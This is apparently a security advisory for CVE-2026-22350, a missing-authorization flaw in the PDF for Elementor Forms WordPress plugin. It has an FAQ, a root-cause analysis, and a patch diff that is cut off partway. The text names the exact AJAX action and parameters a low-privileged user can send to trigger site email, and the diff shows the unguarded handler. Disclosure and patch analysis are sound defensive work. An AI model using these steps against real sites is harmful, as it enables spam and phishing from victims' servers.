What is CVE-2026-22350?

CVE-2026-22350 is a medium severity vulnerability in the PDF for Elementor Forms plugin for WordPress. It is caused by a missing authorization check in the ‘yeepdf_builder_send_email_testing’ function, allowing authenticated users with Subscriber-level access or higher to send test emails without proper permissions.

How does the vulnerability work?

The vulnerability allows authenticated attackers to send a POST request to the WordPress AJAX handler, triggering the sending of emails through the site. Since there are no capability checks in place, any authenticated user can exploit this function to send emails, potentially leading to spam or phishing attacks.

Who is affected by this vulnerability?

All users of the PDF for Elementor Forms plugin versions up to and including 6.3.1 are affected. This includes any WordPress site where the plugin is installed, particularly those with authenticated users who have Subscriber-level access or higher.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the PDF for Elementor Forms plugin installed. If it is version 6.3.1 or earlier, your site is at risk. You can find the version in the WordPress admin panel under ‘Plugins’.

How can I fix this vulnerability?

The vulnerability is fixed in version 6.5.0 of the PDF for Elementor Forms plugin. Update your plugin to this version or later to mitigate the risk. Ensure to regularly check for updates to maintain security.

What if I cannot update the plugin immediately?

If immediate updating is not possible, consider temporarily disabling the PDF for Elementor Forms plugin to prevent exploitation. Additionally, review user roles and limit access to authenticated users where feasible.

What does the CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability does not allow for remote code execution or privilege escalation, it still poses a significant risk due to the potential for unauthorized actions that could lead to spam or phishing.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an authenticated user can exploit the vulnerability by sending a crafted POST request to the vulnerable AJAX endpoint. It illustrates the ease of exploitation using a valid authentication cookie, highlighting the lack of authorization checks.

What are the potential consequences of exploitation?

If exploited, this vulnerability could allow attackers to send arbitrary emails from the site, potentially leading to spam, phishing campaigns, or harassment. This could also result in the site’s email server being blacklisted if the functionality is abused.

Is there a way to monitor for exploitation attempts?

Yes, you can monitor your server logs for unusual POST requests to the admin-ajax.php endpoint. Additionally, consider using security plugins that offer logging and alerting features for suspicious activity related to AJAX requests.

What should I do if I suspect my site has been exploited?

If you suspect exploitation, immediately disable the affected plugin and review your email logs for any unauthorized activity. Change passwords for all user accounts and consider conducting a full security audit to ensure no other vulnerabilities exist.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-22350: PDF for Elementor Forms + Drag And Drop Template Builder <= 6.3.1 – Missing Authorization (pdf-for-elementor-forms)

CVE ID CVE-2026-22350

Plugin pdf-for-elementor-forms

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 6.3.1

Patched Version 6.5.0

Disclosed February 10, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-22350:
The PDF for Elementor Forms + Drag And Drop Template Builder plugin for WordPress, versions up to and including 6.3.1, contains a missing authorization vulnerability. This flaw allows authenticated attackers with Subscriber-level permissions or higher to perform unauthorized actions, specifically sending test emails via a vulnerable AJAX handler.

Root Cause:
The vulnerability originates in the `yeepdf_builder_send_email_testing` function within the `Yeepdf_Ajax` class, located in `/pdf-for-elementor-forms/backend/ajax.php`. The function is hooked via `wp_ajax_yeepdf_builder_send_email_testing` (line 4 in the diff). The function directly processes POST parameters `id` and `email` without performing any capability check (lines 67-68 in the original code). The absence of `check_ajax_referer` or any user role validation means any authenticated user can trigger this function.

Exploitation:
An attacker with a valid WordPress authentication cookie (Subscriber role or higher) can send a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `yeepdf_builder_send_email_testing`. The request must include the parameters `id` (a post ID) and `email` (the target email address). The plugin will then use `wp_mail` to send a test email from the WordPress site, potentially enabling spam or phishing campaigns.

Patch Analysis:
The patch removes the vulnerable AJAX handler entirely. In the patched version, line 4 of `ajax.php` shows the removal of the `add_action` call for `wp_ajax_yeepdf_builder_send_email_testing`. Consequently, the `yeepdf_builder_send_email_testing` function (lines 67-78 in the original) is also removed. This elimination of the endpoint is the primary fix. The patch also adds nonce verification (`check_ajax_referer`) and proper input sanitization (`wp_unslash`) to other AJAX functions in the same file, hardening the plugin against similar issues.

Impact:
Successful exploitation allows low-privileged authenticated users to abuse the site’s mail functionality. Attackers can send arbitrary test emails, which could be used for spam, phishing attempts, or harassment. This action could also lead to email server blacklisting if abused at scale. The vulnerability does not directly allow privilege escalation or remote code execution, but it constitutes an unauthorized action violating the integrity of the plugin’s administrative functions.

Differential between vulnerable and patched code

Code Diff

--- a/pdf-for-elementor-forms/backend/ajax.php
+++ b/pdf-for-elementor-forms/backend/ajax.php
@@ -3,7 +3,6 @@
 class Yeepdf_Ajax {
 	function __construct(){
 		add_action( 'wp_ajax_yeepdf_builder_text', array($this,'yeepdf_builder_text') );
-		add_action( 'wp_ajax_yeepdf_builder_send_email_testing', array($this,'yeepdf_builder_send_email_testing') );
 		add_action( 'wp_ajax_yeepdf_builder_export_html', array($this,'yeepdf_builder_export_html') );
 		add_action( 'wp_ajax_pdf_reset_template', array($this,'pdf_reset_template') );
 		add_action( 'wp_ajax_yeepdf_import_template', array($this,'yeepdf_import_template') );
@@ -11,7 +10,8 @@
 		add_action('add_meta_boxes', array($this,'remove_wp_seo_meta_box'), 100);
 	}
 	function yeepdf_import_template(){
-		$url = sanitize_text_field($_POST['url']);
+		check_ajax_referer('_yeepdf_check_nonce', '_nonce');
+		$url = sanitize_text_field(wp_unslash($_POST['url']));
 		$upload_dir = wp_upload_dir();
 		$path = str_replace($upload_dir['baseurl'], $upload_dir['basedir'], $url);
 		$json_content = file_get_contents($path);
@@ -20,16 +20,18 @@
 		die();
 	}
 	function pdf_reset_template(){
+
+		check_ajax_referer('_yeepdf_check_nonce', '_nonce');
 		if( isset($_POST["id"])){
-			$post_id = sanitize_text_field($_POST['id']);
+			$post_id = sanitize_text_field(wp_unslash($_POST['id']));
 			update_post_meta( $post_id, 'data_email', '' );
 		}
 		die();
 	}
 	function pdf_reset_template_php(){
 		if( isset($_GET["pdf_reset"])){
-			if(wp_verify_nonce($_GET['_wpnonce'], 'pdf_reset')){
-				$post_id = sanitize_text_field($_GET['post']);
+			if(wp_verify_nonce(sanitize_text_field(wp_unslash($_GET['_wpnonce'])), 'pdf_reset')){
+				$post_id = sanitize_text_field(wp_unslash($_GET['post']));
 				update_post_meta( $post_id, 'data_email', '' );
 			}
 		}
@@ -38,8 +40,9 @@
 		remove_meta_box('wpseo_meta', "yeepdf", 'normal');
 	}
 	function yeepdf_builder_export_html(){
+		check_ajax_referer('_yeepdf_check_nonce', '_nonce');
 		if( isset($_POST["id"])){
-			$post_id = sanitize_text_field($_POST['id']);
+			$post_id = sanitize_text_field(wp_unslash($_POST['id']));
 			$id = get_post_meta( $post_id,'data_email_email',true);
 			include YEEPDF_CREATOR_BUILDER_PATH."pdf-templates/header.php";
 			echo do_shortcode($id);
@@ -48,7 +51,7 @@
 		die();
 	}
 	function yeepdf_builder_text(){
-		check_ajax_referer( '_nonce', '_yeepdf_check_nonce' );
+		check_ajax_referer('_yeepdf_check_nonce', '_nonce');
 		if( class_exists("Yeepdf_Addons_Woocommerce_Shortcodes")){
 			$shortcode = new Yeepdf_Addons_Woocommerce_Shortcodes;
 			$order_id = sanitize_text_field($_POST["order_id"]);
@@ -66,16 +69,5 @@
 		echo $string_with_shortcodes; // phpcs:ignore WordPress.Security.EscapeOutput
 		die();
 	}
-	function yeepdf_builder_send_email_testing(){
-		$post_id = sanitize_text_field($_POST["id"]);
-		$email =  sanitize_email($_POST["email"]);
-		$data = wp_mail( $email, esc_html__( "WP Buider Email Testing", "pdf-for-wpforms" ), $post_id );
-		if($data) {
-			esc_html_e("Sent email","pdf-for-wpforms");
-		}else{
-			esc_html_e("Can't send email","pdf-for-wpforms");
-		}
-		die();
-	}
 }
 new Yeepdf_Ajax;
 No newline at end of file
--- a/pdf-for-elementor-forms/backend/dropbox_api.php
+++ b/pdf-for-elementor-forms/backend/dropbox_api.php
@@ -1,106 +1,125 @@
 <?php
 if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
 class Yeepdf_Dropbox_API {
-    public static function get_token($clientId,$clientSecret,$authorizationCode){
-        $url = "https://api.dropbox.com/oauth2/token";
-        //$authorizationCode = "BJ8qO0zpOjAAAAAAAAAyYfC1TjEznVFRrWsE3DSARjI";
-        $data = [
-            "code" => $authorizationCode,
-            "grant_type" => "authorization_code",
-            "client_id" => $clientId,
-            "client_secret" => $clientSecret
-        ];
-        $ch = curl_init($url);
-        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
-        curl_setopt($ch, CURLOPT_POST, true);
-        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
-        $response = curl_exec($ch);
-        curl_close($ch);
-        $response = json_decode($response, true);
-        if (isset($response["access_token"])) {
-            update_option( "_yeepdf_dropbox_api_token", $response);
-            update_option( "_yeepdf_dropbox_api_token_refresh_token", $response["refresh_token"]);
-            return "ok";
-        }else{
-            if(isset($response["error_description"])){
-                return $response["error_description"];
-            }else{
-                return "error";
+    public static function get_token( $clientId, $clientSecret, $authorizationCode ) {
+        $response = wp_remote_post(
+            'https://api.dropbox.com/oauth2/token',
+            array(
+                'timeout' => 20,
+                'headers' => array(
+                    'Content-Type' => 'application/x-www-form-urlencoded',
+                ),
+                'body'    => array(
+                    'code'          => $authorizationCode,
+                    'grant_type'    => 'authorization_code',
+                    'client_id'     => $clientId,
+                    'client_secret' => $clientSecret,
+                ),
+            )
+        );
+        if ( is_wp_error( $response ) ) {
+            return $response->get_error_message();
+        }
+        $body = wp_remote_retrieve_body( $response );
+        $data = json_decode( $body, true );
+        if ( isset( $data['access_token'] ) ) {
+            update_option( '_yeepdf_dropbox_api_token', $data );
+            if ( isset( $data['refresh_token'] ) ) {
+                update_option( '_yeepdf_dropbox_api_token_refresh_token', $data['refresh_token'] );
             }
+            return 'ok';
         }
+        return isset( $data['error_description'] ) ? $data['error_description'] : 'error';
     }
-    public static function uppload_files($fileTmpPath) {
-        $data_dropbox = get_option("_yeepdf_dropbox_api_token");
-        $refresh_token = get_option("_yeepdf_dropbox_api_token_refresh_token");
-        if(isset($data_dropbox["access_token"])) {
-            $clientId = get_option("pdf_creator_dropbox_token");
-            $clientSecret = get_option("pdf_creator_dropbox_token_secret");
-            $accessToken = $data_dropbox["access_token"];
-            $accessToken_ok = self::checkAccessToken($accessToken,$refresh_token,$clientId,$clientSecret);
-            $filename = basename($fileTmpPath);
-            $dropboxPath = '/' . $filename;
-            $file = fopen($fileTmpPath, 'rb');
-            $fileSize = filesize($fileTmpPath);
-            $ch = curl_init('https://content.dropboxapi.com/2/files/upload');
-            curl_setopt($ch, CURLOPT_HTTPHEADER, [
-                'Authorization: Bearer ' . $accessToken_ok,
-                'Content-Type: application/octet-stream',
-                'Dropbox-API-Arg: ' . json_encode([
-                    "path" => $dropboxPath,
-                    "mode" => "add",
-                    "autorename" => true,
-                    "mute" => false
-                ])
-            ]);
-            curl_setopt($ch, CURLOPT_POST, true);
-            curl_setopt($ch, CURLOPT_POSTFIELDS, fread($file, $fileSize));
-            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
-            $response = curl_exec($ch);
-            curl_close($ch);
-            fclose($file);
+    public static function uppload_files( $fileTmpPath ) {
+        if ( ! file_exists( $fileTmpPath ) ) {
+            return;
+        }
+        $data_dropbox  = get_option( '_yeepdf_dropbox_api_token' );
+        $refresh_token = get_option( '_yeepdf_dropbox_api_token_refresh_token' );
+        if ( ! isset( $data_dropbox['access_token'] ) ) {
+            return;
         }
+        $clientId     = get_option( 'pdf_creator_dropbox_token' );
+        $clientSecret = get_option( 'pdf_creator_dropbox_token_secret' );
+        $accessToken  = self::checkAccessToken(
+            $data_dropbox['access_token'],
+            $refresh_token,
+            $clientId,
+            $clientSecret
+        );
+        $filename    = basename( $fileTmpPath );
+        $dropboxPath = '/' . $filename;
+        $fileSize    = filesize( $fileTmpPath );
+        $response = wp_remote_post(
+            'https://content.dropboxapi.com/2/files/upload',
+            array(
+                'timeout' => 60,
+                'headers' => array(
+                    'Authorization'    => 'Bearer ' . $accessToken,
+                    'Content-Type'     => 'application/octet-stream',
+                    'Dropbox-API-Arg'  => wp_json_encode(
+                        array(
+                            'path'       => $dropboxPath,
+                            'mode'       => 'add',
+                            'autorename' => true,
+                            'mute'       => false,
+                        )
+                    ),
+                ),
+                'body'    => file_get_contents( $fileTmpPath ),
+            )
+        );
+        return $response;
     }
-    public static function checkAccessToken($access_token,$refresh_token,$clientId,$clientSecret) {
-       $curl = curl_init();
-        curl_setopt_array($curl, array(
-          CURLOPT_URL => 'https://api.dropboxapi.com/2/users/get_current_account',
-          CURLOPT_RETURNTRANSFER => true,
-          CURLOPT_ENCODING => '',
-          CURLOPT_MAXREDIRS => 10,
-          CURLOPT_TIMEOUT => 0,
-          CURLOPT_FOLLOWLOCATION => true,
-          CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
-          CURLOPT_CUSTOMREQUEST => 'POST',
-          CURLOPT_HTTPHEADER => array(
-            'Authorization: Bearer '.$access_token
-          ),
-        ));
-        $response = curl_exec($curl);
-        $result = json_decode($response, true);
-        if(!isset($result["account_id"])) {
-            return self::getNewAccessToken($refresh_token, $clientId, $clientSecret,$access_token);
-        }else{
+    public static function checkAccessToken( $access_token, $refresh_token, $clientId, $clientSecret ) {
+        $response = wp_remote_post(
+            'https://api.dropboxapi.com/2/users/get_current_account',
+            array(
+                'timeout' => 20,
+                'headers' => array(
+                    'Authorization' => 'Bearer ' . $access_token,
+                ),
+            )
+        );
+        if ( is_wp_error( $response ) ) {
             return $access_token;
         }
+        $body   = wp_remote_retrieve_body( $response );
+        $result = json_decode( $body, true );
+        if ( ! isset( $result['account_id'] ) ) {
+            return self::getNewAccessToken(
+                $refresh_token,
+                $clientId,
+                $clientSecret,
+                $access_token
+            );
+        }
+        return $access_token;
     }
-    public static function getNewAccessToken($refresh_token, $clientId, $clientSecret,$access_token) {
-        $url = "https://api.dropbox.com/oauth2/token";
-        $data = [
-            "refresh_token" => $refresh_token,
-            "grant_type" => "refresh_token",
-            "client_id" => $clientId,
-            "client_secret" => $clientSecret
-        ];
-        $ch = curl_init($url);
-        curl_setopt($ch, CURLOPT_POST, true);
-        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
-        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
-        curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/x-www-form-urlencoded"]);
-        $response = curl_exec($ch);
-        curl_close($ch);
-        $result = json_decode($response, true);
-        if (isset($result['access_token'])) {
-            update_option( "_yeepdf_dropbox_api_token", $result);
+    public static function getNewAccessToken( $refresh_token, $clientId, $clientSecret, $access_token ) {
+        $response = wp_remote_post(
+            'https://api.dropbox.com/oauth2/token',
+            array(
+                'timeout' => 20,
+                'headers' => array(
+                    'Content-Type' => 'application/x-www-form-urlencoded',
+                ),
+                'body'    => array(
+                    'refresh_token' => $refresh_token,
+                    'grant_type'    => 'refresh_token',
+                    'client_id'     => $clientId,
+                    'client_secret' => $clientSecret,
+                ),
+            )
+        );
+        if ( is_wp_error( $response ) ) {
+            return $access_token;
+        }
+        $body   = wp_remote_retrieve_body( $response );
+        $result = json_decode( $body, true );
+        if ( isset( $result['access_token'] ) ) {
+            update_option( '_yeepdf_dropbox_api_token', $result );
             return $result['access_token'];
         }
         return $access_token;
--- a/pdf-for-elementor-forms/backend/forms/checkbox.php
+++ b/pdf-for-elementor-forms/backend/forms/checkbox.php
@@ -10,7 +10,7 @@
         <li>
             <div class="momongaDraggable" data-type="form_checkbox">
                 <i class="dashicons dashicons-yes-alt"></i>
-                <div class="yeepdf-tool-text"><?php esc_html_e("Checkbox","pdf-for-wpforms") ?></div>
+                <div class="yeepdf-tool-text"><?php esc_html_e("Checkbox",'pdf-for-woocommerce') ?></div>
             </div>
         </li>
         <?php
--- a/pdf-for-elementor-forms/backend/forms/index.php
+++ b/pdf-for-elementor-forms/backend/forms/index.php
@@ -11,7 +11,7 @@
         ?>
         <div class="builder__widget--inner">
             <div class="builder__widget_tab builder__widget_genaral">
-                <div class="builder__widget_tab_title"><span class="builder__widget_tab_title_t"><?php esc_attr_e( "Forms", "yeepdf") ?></span><span
+                <div class="builder__widget_tab_title"><span class="builder__widget_tab_title_t"><?php esc_attr_e( "Forms", "pdf-for-woocommerce") ?></span><span
                         class="builder__widget_tab_title_icon dashicons dashicons-arrow-down-alt2"></span><span
                         class="builder__widget_tab_title_icon dashicons dashicons-arrow-up-alt2"></span>
                 </div>
@@ -27,7 +27,7 @@
         <li>
             <div class="momongaDraggable" data-type="form_text">
                 <i class="dashicons dashicons-editor-textcolor"></i>
-                <div class="yeepdf-tool-text"><?php esc_html_e("Text Input","pdf-for-wpforms") ?></div>
+                <div class="yeepdf-tool-text"><?php esc_html_e("Text Input",'pdf-for-woocommerce') ?></div>
             </div>
         </li>
         <?php
@@ -59,17 +59,17 @@
         ?>
         <div class="builder__editor--item builder__editor--item-form_label">
             <div class="builder__editor--html">
-                <label><?php esc_html_e("Label","pdf-for-wpforms") ?></label>
+                <label><?php esc_html_e("Label",'pdf-for-woocommerce') ?></label>
                 <div class="yeepdf_setting_group">
                     <div class="yeepdf_setting_row">
                         <div class="yeepdf_settings_group-wrapper">
-                            <label class="yeepdf_checkbox_label"><?php esc_html_e("Before text","pdf-for-wpforms") ?></label>
+                            <label class="yeepdf_checkbox_label"><?php esc_html_e("Before text",'pdf-for-woocommerce') ?></label>
                             <div class="setting_input-wrapper">
                                 <input name="yeepdf_name[]" class="yeepdf_setting_input yeepdf_setting_form_before_label"  type="text" >
                             </div>
                         </div>
                         <div class="yeepdf_settings_group-wrapper">
-                            <label class="yeepdf_checkbox_label"><?php esc_html_e("After text","pdf-for-wpforms") ?></label>
+                            <label class="yeepdf_checkbox_label"><?php esc_html_e("After text",'pdf-for-woocommerce') ?></label>
                             <div class="setting_input-wrapper">
                                 <input name="yeepdf_name[]" class="yeepdf_setting_input yeepdf_setting_form_after_label"  type="text" >
                             </div>
@@ -80,11 +80,11 @@
         </div>
         <div class="builder__editor--item builder__editor--item-form_default_val">
             <div class="builder__editor--html">
-                <label><?php esc_html_e("Default Value","pdf-for-wpforms") ?></label>
+                <label><?php esc_html_e("Default Value",'pdf-for-woocommerce') ?></label>
                 <div class="yeepdf_setting_group">
                     <div class="yeepdf_setting_row">
                         <div class="yeepdf_settings_group-wrapper">
-                            <label class="yeepdf_checkbox_label"><?php esc_html_e("Value","pdf-for-wpforms") ?></label>
+                            <label class="yeepdf_checkbox_label"><?php esc_html_e("Value",'pdf-for-woocommerce') ?></label>
                             <div class="setting_input-wrapper">
                                 <input name="yeepdf_name[]" class="yeepdf_setting_input yeepdf_setting_form_default"  type="text" >
                             </div>
@@ -95,11 +95,11 @@
         </div>
         <div class="builder__editor--item builder__editor--item-form_default_select">
             <div class="builder__editor--html">
-                <label><?php esc_html_e("Value","pdf-for-wpforms") ?></label>
+                <label><?php esc_html_e("Value",'pdf-for-woocommerce') ?></label>
                 <div class="yeepdf_setting_group">
                     <div class="yeepdf_setting_row">
                         <div class="yeepdf_settings_group-wrapper">
-                            <label class="yeepdf_checkbox_label"><?php esc_html_e("Value","pdf-for-wpforms") ?></label>
+                            <label class="yeepdf_checkbox_label"><?php esc_html_e("Value",'pdf-for-woocommerce') ?></label>
                             <div class="setting_input-wrapper">
                                 <textarea name="yeepdf_name[]" class="yeepdf_setting_input yeepdf_setting_form_default_value" ></textarea>
                             </div>
--- a/pdf-for-elementor-forms/backend/forms/radio.php
+++ b/pdf-for-elementor-forms/backend/forms/radio.php
@@ -10,7 +10,7 @@
         <li>
             <div class="momongaDraggable" data-type="form_radio">
                 <i class="dashicons dashicons-marker"></i>
-                <div class="yeepdf-tool-text"><?php esc_html_e("Radio","pdf-for-wpforms") ?></div>
+                <div class="yeepdf-tool-text"><?php esc_html_e("Radio",'pdf-for-woocommerce') ?></div>
             </div>
         </li>
         <?php
--- a/pdf-for-elementor-forms/backend/forms/select.php
+++ b/pdf-for-elementor-forms/backend/forms/select.php
@@ -10,13 +10,13 @@
         <li>
             <div class="momongaDraggable" data-type="form_select">
                 <i class="dashicons dashicons-list-view"></i>
-                <div class="yeepdf-tool-text"><?php esc_html_e("Select","pdf-for-wpforms") ?></div>
+                <div class="yeepdf-tool-text"><?php esc_html_e("Select",'pdf-for-woocommerce') ?></div>
             </div>
         </li>
         <?php
     }
     function add_input_text_settings($type){
-        $rand_name = rand(10000,9999999);
+        $rand_name = wp_rand(10000,9999999);
         $type["block"]["form_select"]["builder"] = '
         <div class="builder-elements">
             <div class="builder-elements-content" data-type="form_select">
--- a/pdf-for-elementor-forms/backend/forms/textarea.php
+++ b/pdf-for-elementor-forms/backend/forms/textarea.php
@@ -10,7 +10,7 @@
         <li>
             <div class="momongaDraggable" data-type="form_textarea">
                 <i class="dashicons dashicons-button"></i>
-                <div class="yeepdf-tool-text"><?php esc_html_e("Textarea","pdf-for-wpforms") ?></div>
+                <div class="yeepdf-tool-text"><?php esc_html_e("Textarea",'pdf-for-woocommerce') ?></div>
             </div>
         </li>
         <?php
--- a/pdf-for-elementor-forms/backend/index.php
+++ b/pdf-for-elementor-forms/backend/index.php
@@ -86,22 +86,22 @@
         }
 ?>
         <div class="builder__editor--item builder__editor--item-settings">
-            <label><?php esc_html_e("Settings", "pdf-for-wpforms") ?></label>
+            <label><?php esc_html_e("Settings", 'pdf-for-woocommerce') ?></label>
             <div class="yeepdf_setting_group">
                 <div class="yeepdf_setting_row">
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("DPI", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("DPI", 'pdf-for-woocommerce') ?></label>
                         <input name="builder_pdf_settings[dpi]" type="text" class="yeepdf_setting_input" value="<?php echo esc_attr($pdfs["dpi"]) ?>">
                     </div>
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Orientation", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Orientation", 'pdf-for-woocommerce') ?></label>
                         <select name="builder_pdf_settings[orientation]" class="yeepdf_setting_input">
-                            <option value="P"><?php esc_html_e("Portrait", "pdf-for-wpforms") ?></option>
-                            <option <?php selected($pdfs["orientation"], "L") ?> value="L"><?php esc_html_e("Landscape", "pdf-for-wpforms") ?></option>
+                            <option value="P"><?php esc_html_e("Portrait", 'pdf-for-woocommerce') ?></option>
+                            <option <?php selected($pdfs["orientation"], "L") ?> value="L"><?php esc_html_e("Landscape", 'pdf-for-woocommerce') ?></option>
                         </select>
                     </div>
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Paper Size", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Paper Size", 'pdf-for-woocommerce') ?></label>
                         <select name="builder_pdf_settings[size]" class="yeepdf_setting_input">
                             <?php
                             foreach ($sizes as $group => $options) {
@@ -112,7 +112,7 @@
                                         $check = "selected";
                                     }
                             ?>
-                                    <option <?php echo esc_attr($check) ?> value="<?php echo esc_attr($key) ?>"><?php echo esc_attr($value) ?></option>
+                                    <option <?php echo esc_attr($check) ?> value="<?php echo esc_attr($key) ?>"><?php echo esc_html($value) ?></option>
                             <?php
                                 }
                                 echo wp_kses_post('</optgroup>');
@@ -123,7 +123,7 @@
                 </div>
                 <div class="yeepdf_setting_row">
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Font family", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Font family", 'pdf-for-woocommerce') ?></label>
                         <select class="font_family yeepdf_setting_input" name="builder_pdf_settings_font_family">
                             <?php
                             foreach ($list_fonts as $font => $vl) {
@@ -141,22 +141,22 @@
                         </select>
                     </div>
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Font size", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Font size", 'pdf-for-woocommerce') ?></label>
                         <input type="number" class="font-size-main">
                     </div>
                     <div class="yeepdf_settings_group-wrapper">
-                        <?php Yeepdf_Editor::get_color_pick(esc_html__("Font color", "pdf-for-wpforms")) ?>
+                        <?php Yeepdf_Editor::get_color_pick(esc_html__("Font color", 'pdf-for-woocommerce')) ?>
                     </div>
                 </div>
                 <div class="yeepdf_setting_row">
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Header Template", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Header Template", 'pdf-for-woocommerce') ?></label>
                         <?php
                         do_action("yeepdf_header_settings", $pdfs, $list_tempates);
                         ?>
                     </div>
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Footer Template", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Footer Template", 'pdf-for-woocommerce') ?></label>
                         <?php
                         do_action("yeepdf_footer_settings", $pdfs, $list_tempates);
                         ?>
@@ -164,7 +164,7 @@
                 </div>
                 <div class="yeepdf_setting_row">
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Watermark text", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Watermark text", 'pdf-for-woocommerce') ?></label>
                         <?php
                         do_action("yeepdf_watermark_text_settings", $pdfs);
                         ?>
@@ -172,19 +172,19 @@
                 </div>
                 <div class="yeepdf_setting_row">
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Watermark image", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Watermark image", 'pdf-for-woocommerce') ?></label>
                         <?php
                         do_action("yeepdf_watermark_img_settings", $pdfs);
                         ?>
                     </div>
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Upload image", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Upload image", 'pdf-for-woocommerce') ?></label>
                         <input type="button" class="upload-editor--image-ok button button-primary" value="Upload">
                     </div>
                 </div>
                 <div class="yeepdf_setting_row">
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Custom CSS", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Custom CSS", 'pdf-for-woocommerce') ?></label>
                         <?php
                         $css = "";
                         if (isset($pdfs["css"])) {
@@ -196,7 +196,7 @@
                 </div>
                 <div class="yeepdf_setting_row">
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Disable Active Form", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Disable Active Form", 'pdf-for-woocommerce') ?></label>
                         <?php
                         $css = "";
                         if (isset($pdfs["disable_active_form"]) && $pdfs["disable_active_form"] == "yes") {
@@ -237,7 +237,7 @@
                     <div class="" title="Templates">
                         <a href="#" class="button yeepdf-email-choose-template"><span
                                 class="dashicons dashicons-welcome-add-page"></span>
-                            <?php esc_html_e("Templates", "yeepdf")  ?></a>
+                            <?php esc_html_e("Templates", "pdf-for-woocommerce")  ?></a>
                     </div>
                     <div class="" title="Import Template">
                         <a href="#" class="button yeepdf-email-import"><span class="dashicons dashicons-upload"></span></a>
@@ -256,10 +256,10 @@
                             $url = add_query_arg(array("pdf_preview" => "preview", "preview" => 1, "id" => $post_id), get_home_url());
                         }
                         ?>
-                        <a class="button" target="_blank" href="<?php echo esc_url(wp_nonce_url($url, "yeepdf")) ?>"><span class="dashicons dashicons-visibility"></span> <?php esc_html_e("Preview", "yeepdf")  ?></a>
+                        <a class="button" target="_blank" href="<?php echo esc_url(wp_nonce_url($url, "yeepdf")) ?>"><span class="dashicons dashicons-visibility"></span> <?php esc_html_e("Preview", "pdf-for-woocommerce")  ?></a>
                     </div>
                     <div class="">
-                        <a href="#" class="button button-yeepdf-save button-primary-ok"><span class="dashicons dashicons-saved"></span> <?php esc_html_e("Save", "yeepdf")  ?></a>
+                        <a href="#" class="button button-yeepdf-save button-primary-ok"><span class="dashicons dashicons-saved"></span> <?php esc_html_e("Save", "pdf-for-woocommerce")  ?></a>
                     </div>
                 </div>
             </div>
@@ -271,22 +271,22 @@
                     <div class="builder__widget">
                         <div class="builder_main_info">
                             <div class="builder_main_info_text">
-                                <?php esc_attr_e("YeePDF - PDF Customizer", "yeepdf") ?>
+                                <?php esc_attr_e("YeePDF - PDF Customizer", "pdf-for-woocommerce") ?>
                             </div>
                             <div class="builder_main_info_icon" title="Go To Dashboard">
                                 <a href="<?php echo esc_url(get_admin_url() . "edit.php?post_type=yeepdf") ?>"><span class="dashicons dashicons-wordpress"></span></a>
                             </div>
                         </div>
                         <ul class="builder__tab">
-                            <li class="tab__block_elements"><a class="active" id="#tab__block"><span><?php esc_html_e("Elements", "pdf-for-wpforms")  ?></span> </a></li>
-                            <li><a class="" id="#tab__editor"><span><?php esc_html_e("Editor", "pdf-for-wpforms")  ?></span></a></li>
+                            <li class="tab__block_elements"><a class="active" id="#tab__block"><span><?php esc_html_e("Elements", 'pdf-for-woocommerce')  ?></span> </a></li>
+                            <li><a class="" id="#tab__editor"><span><?php esc_html_e("Editor", 'pdf-for-woocommerce')  ?></span></a></li>
                         </ul>
                         <div class="tab__inner">
                             <div class="tab__content active" id="tab__block">
                                 <div class="builder__widget--inner">
